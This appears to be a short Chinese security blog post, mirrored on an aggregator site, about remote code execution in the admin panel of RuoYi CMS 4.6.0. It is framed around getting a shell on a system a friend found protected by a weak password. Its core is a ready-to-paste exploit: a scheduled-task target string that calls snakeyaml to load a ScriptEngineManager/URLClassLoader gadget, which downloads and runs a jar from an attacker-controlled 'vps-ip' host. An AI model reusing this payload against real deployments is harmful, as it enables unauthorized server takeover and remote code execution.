zoukankan      html  css  js  c++  java
  • 若依CMS4.6.0后台RCE

    0x00 前言

    此漏洞源于一个朋友遇到了这个系统,后台有弱口令,问能不能shell

    开始审计,先看官方文档,发现作者在文档中写明了历史漏洞,告诫了用户使用风险,还算是良心了

    https://doc.ruoyi.vip/ruoyi/document/kslj.html#%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

    重点是shell,且目标为当时最新版本,历史漏洞已经无法用了,由于有后台权限,搭建了系统在后台浏览了一下功能,发现存在一个任务调度的功能

    根据添加调度任务的url定位到代码,最终定位到任务执行代码:

     可以看到代码无任何黑白名单限制,直接动态调用任意类任意方法

    摸一下依赖有snakeyaml

    便想着用artsploit攻击spring-cloud 的那一套思路(https://github.com/artsploit/yaml-payload

    0x01 漏洞利用

    位置:系统监控->定时任务->添加任务

    任务名称 :随便填
    调用目标字符串:
    org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]') 
    cron表达式: 0/50 * * * * ? (随便填)
    执行策略: 执行一次
    状态:正常
     
    成功getshell

    利用思路有很多,抛砖引玉了。

    0x02 总结

    漏洞未在最新4.6.1版本上试过,代码如果没改的话,理论上都是可以的。

  • 相关阅读:
    PHP学习(一)----变量及字符串
    swith
    重写和重载的区别
    静态对象与非静态对象
    继承
    面向对象
    五个对面向对象的实例
    双色球 36选7
    菱形java代码
    双色球代码
  • 原文地址:https://www.cnblogs.com/r00tuser/p/14693462.html
Copyright © 2011-2022 走看看